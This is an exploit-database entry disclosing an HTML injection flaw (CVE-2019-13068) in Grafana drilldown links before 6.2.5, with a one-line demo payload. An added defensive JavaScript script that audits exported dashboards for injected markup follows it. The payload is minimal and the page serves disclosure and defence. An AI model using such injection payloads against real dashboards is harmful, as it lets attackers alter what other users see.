## https://sploitus.com/exploit?id=PACKETSTORM:171500
# Exploit Title: Grafana <=6.2.4 - HTML Injection  
# Date: 30-06-2019  
# Exploit Author: SimranJeet Singh  
# Vendor Homepage: https://grafana.com/  
# Software Link: https://grafana.com/grafana/download/6.2.4  
# Version: 6.2.4  
# CVE : CVE-2019-13068  
  
The file "public/app/features/panel/panel_ctrl.ts" in Grafana before 6.2.5 allows HTML injection in panel drilldown links (via the Title or URL field).  
  
Payload used - <img src="[image_URL]"><h1>Hello</h1>  
  
Best Regards,  
  
SimranJeet
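
For defenders triaging existing dashboards, the following added example (not part of the original advisory and not Grafana code) audits an exported dashboard JSON for panel links whose title or url contains an HTML tag, raw or percent-encoded, and shows the escaped form that would render as text. The JSON shape (panels with a `links` array of `{ title, url }`, optionally nested under row panels or legacy `rows`) and all function names are assumptions made for illustration.

```javascript
// Added example: audit an exported dashboard for panel links carrying HTML markup.
// Assumed JSON shape: panels[] (optionally nested under row panels or legacy rows[]),
// each with links[] of { title, url }. Function names are hypothetical.

const TAG = /<\/?[a-zA-Z][^>]*>/; // "<" directly followed by a letter starts a tag

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Percent-decoding can throw on a lone "%"; fall back to the raw value.
function percentDecode(value) {
  try { return decodeURIComponent(value); } catch { return value; }
}

function* walkPanels(panels) {
  for (const panel of panels || []) {
    yield panel;
    yield* walkPanels(panel.panels); // row panels nest their children
  }
}

function auditPanelLinks(dashboard) {
  const findings = [];
  const legacyRows = (dashboard.rows || []).flatMap((row) => row.panels || []);
  for (const panel of walkPanels([...(dashboard.panels || []), ...legacyRows])) {
    for (const link of panel.links || []) {
      for (const field of ['title', 'url']) {
        const raw = link[field];
        if (typeof raw !== 'string') continue;
        if (TAG.test(raw) || TAG.test(percentDecode(raw))) {
          findings.push({ panelId: panel.id, field, raw, escaped: escapeHtml(raw) });
        }
      }
    }
  }
  return findings;
}

// Constructed sample dashboard (not taken from a real instance).
const sampleDashboard = {
  panels: [
    { id: 1, links: [{ title: 'Runbook', url: 'https://wiki.example.test/cpu?load=100%' }] },
    { id: 2, type: 'row', panels: [
      { id: 3, links: [{ title: '<img src="[image_URL]"><h1>Hello</h1>', url: '/d/abc' }] },
      { id: 4, links: [{ title: 'Details', url: '/d/abc?note=%3Ch1%3EHello%3C%2Fh1%3E' }] },
    ] },
  ],
};

console.log(auditPanelLinks(sampleDashboard));
```

Each finding is a candidate for manual review on instances running a version before 6.2.5, not proof that the link was rendered unescaped.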